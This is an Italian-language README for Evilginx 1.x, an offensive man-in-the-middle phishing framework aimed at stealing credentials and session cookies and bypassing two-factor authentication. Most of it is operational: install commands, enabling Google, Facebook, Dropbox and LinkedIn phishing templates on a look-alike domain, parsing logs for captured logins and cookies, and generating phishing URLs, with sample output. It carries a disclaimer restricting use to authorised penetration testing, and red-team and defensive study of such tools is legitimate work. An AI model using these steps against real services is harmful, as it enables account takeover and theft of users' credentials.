
UTILIZZA LA NUOVA VERSIONE: https://github.com/kgretzky/evilginx2

QUESTA VERSIONE È OBSOLETA. USA L'ULTIMA VERSIONE!
EVILGINX 2: https://github.com/kgretzky/evilginx2
Evilginx è un framework per attacchi man-in-the-middle utilizzato per il phishing di credenziali e cookie di sessione di qualsiasi servizio web. Il suo core gira sul server HTTP Nginx, che utilizza proxy_pass e sub_filter per inoltrare e modificare il contenuto HTTP, intercettando il traffico tra client e server.
Puoi imparare come funziona e come installare tutto da solo sul mio blog:
Primo post leggermente obsoleto ora: Evilginx - Phishing Avanzato con Bypass dell'Autenticazione a Due Fattori
Aggiornamento Evilginx 1.0: Evilginx 1.0 Update - Alza il Tuo Livello nel Phishing 2FA
Aggiornamento Evilginx 1.1: Evilginx 1.1 Update
Sono consapevole che Evilginx possa essere utilizzato per scopi molto malvagi. Questo lavoro è semplicemente una dimostrazione di ciò che gli attaccanti esperti possono fare. È responsabilità del difensore prendere in considerazione tali attacchi quando si impostano le difese e trovare modi per proteggersi da questo metodo di phishing. Evilginx dovrebbe essere utilizzato solo in incarichi legittimi di penetration testing con autorizzazione scritta da parte delle vittime del phishing.
Evilginx fornisce uno script di installazione install.sh che si occupa di installare l'intero pacchetto su qualsiasi macchina Debian wheezy/jessie, in modalità fire and forget.
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh
_ _ _
(_) | (_)
_____ ___| | __ _ _ _ __ __ __
/ _ \ \ / / | |/ _` | | '_ \\ \/ /
| __/\ V /| | | (_| | | | | |> <
\___| \_/ |_|_|\__, |_|_| |_/_/\_\
__/ |
by @mrgretzky |___/ v1.0
usage: evilginx.py [-h] {setup,parse,genurl} ...
positional arguments:
{setup,parse,genurl}
setup Configure Evilginx.
parse Parse log file(s).
genurl Generate phishing URL.
optional arguments:
-h, --help show this help message and exit
Abilita o disabilita le configurazioni dei siti da utilizzare con il server Nginx, usando i template Evilginx forniti dalla directory sites.
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
(-l | --enable ENABLE | --disable DISABLE)
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Your phishing domain.
-y Answer all questions with 'Yes'.
-l, --list List available supported apps.
--enable ENABLE Enable following site by name.
--disable DISABLE Disable following site by name.
Elenca i modelli di configurazione dei siti disponibili:
python evilginx.py setup -l
Listing available supported sites:
- dropbox (/root/evilginx/sites/dropbox/config)
subdomains: www
- google (/root/evilginx/sites/google/config)
subdomains: accounts, ssl
- facebook (/root/evilginx/sites/facebook/config)
subdomains: www, m
- linkedin (/root/evilginx/sites/linkedin/config)
subdomains: www
Abilita il sito di phishing google con il dominio preregistrato not-really-google.com:
python evilginx.py setup --enable google -d not-really-google.com
Disabilita il sito di phishing facebook:
python evilginx.py setup --disable facebook
Analizza i log di Nginx per estrarre le credenziali di login e i cookie di sessione intercettati. I log, per impostazione predefinita, vengono salvati nella directory logs, dove risiede lo script evilginx.py.
Questo può essere fatto automaticamente dopo aver abilitato l'analisi automatica nella fase di Setup.
usage: evilginx.py parse [-h] -s SITE [--debug]
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to parse logs for ('all' to parse logs
for all sites).
--debug Does not truncate log file after parsing.
Analizza i log solo per il sito google:
python evilginx.py parse -s google
Analizza i log per tutti i siti disponibili:
python evilginx.py parse -s all
Genera URL di phishing che puoi utilizzare nei tuoi Red Team Assessments.
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT
optional arguments:
-h, --help show this help message and exit
-s SITE, --site SITE Name of site to generate link for.
-r REDIRECT, --redirect REDIRECT
Redirect user to this URL after successful sign-in.
Genera un URL di phishing per google che reindirizzerà la vittima al video di rickroll dopo un login riuscito:
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ
Generated following phishing URLs:
: https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
: https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ